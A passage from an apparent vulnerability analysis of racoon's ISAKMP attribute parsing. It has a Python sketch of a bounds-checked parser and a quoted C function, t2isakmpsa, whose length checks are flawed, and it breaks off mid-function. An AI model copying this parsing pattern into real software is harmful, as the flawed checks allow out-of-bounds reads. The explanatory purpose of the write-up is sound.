A common pattern in racoon for parsing packets containing a list of elements is to do the following. The start of the list is cast to a struct with the same representation as the element header (d). A variable keeps track of the remaining length of the buffer (tlen). Then, a loop is started. In each iteration, it handles the current element. Then it advances the struct to the next value and it decreases the number of remaining bytes with the size of the current element. If that number becomes negative or zero, the loop ends.
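Before looking at the real code, the loop described above can be sketched in Python. This is a simplified model and not a port of racoon: it assumes the usual ISAKMP attribute layout of a 2-byte type, whose top bit marks a fixed 2-byte value, followed by a 2-byte length-or-value field, and all names are our own. It compares the declared length with the bytes that remain after the header, which is exactly the kind of detail that is easy to get slightly wrong.

```python
import struct
from typing import List, Tuple

HEADER = struct.Struct("!HH")   # type (including format bit), length-or-value
AF_BIT = 0x8000                 # assumption: top bit set means a 2-byte value


def parse_attributes(buf: bytes) -> List[Tuple[int, bytes]]:
    """Walk a list of attributes, checking every length against what is left."""
    attrs = []
    offset = 0
    while offset < len(buf):
        remaining = len(buf) - offset
        if remaining < HEADER.size:
            raise ValueError("truncated attribute header")
        raw_type, lorv = HEADER.unpack_from(buf, offset)
        attr_type = raw_type & ~AF_BIT & 0xFFFF
        if raw_type & AF_BIT:
            # Fixed-size form: the second field is the value itself.
            value = struct.pack("!H", lorv)
            size = HEADER.size
        else:
            # Variable-size form: the value follows the header.
            if lorv > remaining - HEADER.size:
                raise ValueError("attribute length exceeds buffer")
            start = offset + HEADER.size
            value = buf[start:start + lorv]
            size = HEADER.size + lorv
        attrs.append((attr_type, value))
        offset += size
    return attrs


ok = struct.pack("!HH", 0x8001, 7) + struct.pack("!HH", 0x000B, 3) + b"abc"
bad = struct.pack("!HH", 0x000B, 4) + b"abc"   # claims 4 bytes, only 3 follow
print(parse_attributes(ok))
```

The second buffer is 7 bytes long and declares a 4-byte value. A check that compares the length with the total remaining bytes (header included) would accept it, while the check above rejects it.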
/*
 * get ISAKMP data attributes
 */
static int
t2isakmpsa(trns, sa)
    struct isakmp_pl_t *trns;
    struct isakmpsa *sa;
{
    struct isakmp_data *d, *prev;
    int flag, type;
    int error = -1;
    int life_t;
    int keylen = 0;
    vchar_t *val = NULL;
    int len, tlen;
    u_char *p;

    tlen = ntohs(trns->h.len) - sizeof(*trns);
    prev = (struct isakmp_data *)NULL;
    d = (struct isakmp_data *)(trns + 1);

    /* default */
    life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
    sa->lifetime = OAKLEY_ATTR_SA_LD_SEC_DEFAULT;
    sa->lifebyte = 0;
    sa->dhgrp = racoon_calloc(1, sizeof(struct dhgroup));
    if (!sa->dhgrp)
        goto err;

    while (tlen > 0) {
        type = ntohs(d->type) & ~ISAKMP_GEN_MASK;
        flag = ntohs(d->type) & ISAKMP_GEN_MASK;

        plog(ASL_LEVEL_DEBUG,
             "type=%s, flag=0x%04x, lorv=%s\n",
             s_oakley_attr(type), flag,
             s_oakley_attr_v(type, ntohs(d->lorv)));

        /* get variable-sized item */
        switch (type) {
        case OAKLEY_ATTR_GRP_PI:
        case OAKLEY_ATTR_GRP_GEN_ONE:
        case OAKLEY_ATTR_GRP_GEN_TWO:
        case OAKLEY_ATTR_GRP_CURVE_A:
        case OAKLEY_ATTR_GRP_CURVE_B:
        case OAKLEY_ATTR_SA_LD:
        case OAKLEY_ATTR_GRP_ORDER:
            if (flag) {    /*TV*/
                len = 2;
                p = (u_char *)&d->lorv;
            } else {    /*TLV*/
                len = ntohs(d->lorv);
                if (len > tlen) {
                    plog(ASL_LEVEL_ERR,
                         "invalid ISAKMP-SA attr, attr-len %d, overall-len %d\n",
                         len, tlen);
                    return -1;
                }
                p = (u_char *)(d + 1);
            }
            val = vmalloc(len);
            if (!val)
                return -1;
            memcpy(val->v, p, len);
            break;

        default:
            break;
        }

        switch (type) {
        case OAKLEY_ATTR_ENC_ALG:
            sa->enctype = (u_int16_t)ntohs(d->lorv);
            break;

        case OAKLEY_ATTR_HASH_ALG:
            sa->hashtype = (u_int16_t)ntohs(d->lorv);
            break;

        case OAKLEY_ATTR_AUTH_METHOD:
            sa->authmethod = ntohs(d->lorv);
            break;

        case OAKLEY_ATTR_GRP_DESC:
            sa->dh_group = (u_int16_t)ntohs(d->lorv);
            break;

        case OAKLEY_ATTR_GRP_TYPE:
        {
            int type = (int)ntohs(d->lorv);
            if (type == OAKLEY_ATTR_GRP_TYPE_MODP)
                sa->dhgrp->type = type;
            else
                return -1;
            break;
        }
        case OAKLEY_ATTR_GRP_PI:
            sa->dhgrp->prime = val;
            break;

        case OAKLEY_ATTR_GRP_GEN_ONE:
            vfree(val);
            if (!flag)
                sa->dhgrp->gen1 = ntohs(d->lorv);
            else {
                int len = ntohs(d->lorv);
                sa->dhgrp->gen1 = 0;
                if (len > 4)
                    return -1;
                memcpy(&sa->dhgrp->gen1, d + 1, len);
                sa->dhgrp->gen1 = ntohl(sa->dhgrp->gen1);
            }
            break;

        case OAKLEY_ATTR_GRP_GEN_TWO:
            vfree(val);
            if (!flag)
                sa->dhgrp->gen2 = ntohs(d->lorv);
            else {
                int len = ntohs(d->lorv);
                sa->dhgrp->gen2 = 0;
                if (len > 4)
                    return -1;
                memcpy(&sa->dhgrp->gen2, d + 1, len);
                sa->dhgrp->gen2 = ntohl(sa->dhgrp->gen2);
            }
            break;

        case OAKLEY_ATTR_GRP_CURVE_A:
            sa->dhgrp->curve_a = val;
            break;

        case OAKLEY_ATTR_GRP_CURVE_B:
            sa->dhgrp->curve_b = val;
            break;

        case OAKLEY_ATTR_SA_LD_TYPE:
        {
            int type = (int)ntohs(d->lorv);
            switch (type) {
            case OAKLEY_ATTR_SA_LD_TYPE_SEC:
            case OAKLEY_ATTR_SA_LD_TYPE_KB:
                life_t = type;
                break;
            default:
                life_t = OAKLEY_ATTR_SA_LD_TYPE_DEFAULT;
                break;
            }
            break;
        }
        case OAKLEY_ATTR_SA_LD:
            if (!prev
             || (ntohs(prev->type) & ~ISAKMP_GEN_MASK) !=
                    OAKLEY_ATTR_SA_LD_TYPE) {
                plog(ASL_LEVEL_ERR,
                     "life duration must follow ltype\n");
                break;
            }

            switch (life_t) {
            case IPSECDOI_ATTR_SA_LD_TYPE_SEC:
                sa->lifetime = ipsecdoi_set_ld(val);
                vfree(val);
                if (sa->lifetime == 0) {
                    plog(ASL_LEVEL_ERR,
                         "invalid life duration.\n");
                    goto err;
                }
                break;
            case IPSECDOI_ATTR_SA_LD_TYPE_KB:
                sa->lifebyte = ipsecdoi_set_ld(val);
                vfree(val);
                if (sa->lifebyte == 0) {
                    plog(ASL_LEVEL_ERR,
                         "invalid life duration.\n");
                    goto err;
                }
                break;
            default:
                vfree(val);
                plog(ASL_LEVEL_ERR,
                     "invalid life type: %d\n", life_t);
                goto err;
            }
            break;

        case OAKLEY_ATTR_KEY_LEN:
        {
            int len = ntohs(d->lorv);
            if (len % 8 != 0) {
                plog(ASL_LEVEL_ERR,
                     "keylen %d: not multiple of 8\n",
                     len);
                goto err;
            }
            sa->encklen = (u_int16_t)len;
            keylen++;
            break;
        }
        case OAKLEY_ATTR_PRF:
        case OAKLEY_ATTR_FIELD_SIZE:
            /* unsupported */
            break;

        case OAKLEY_ATTR_GRP_ORDER: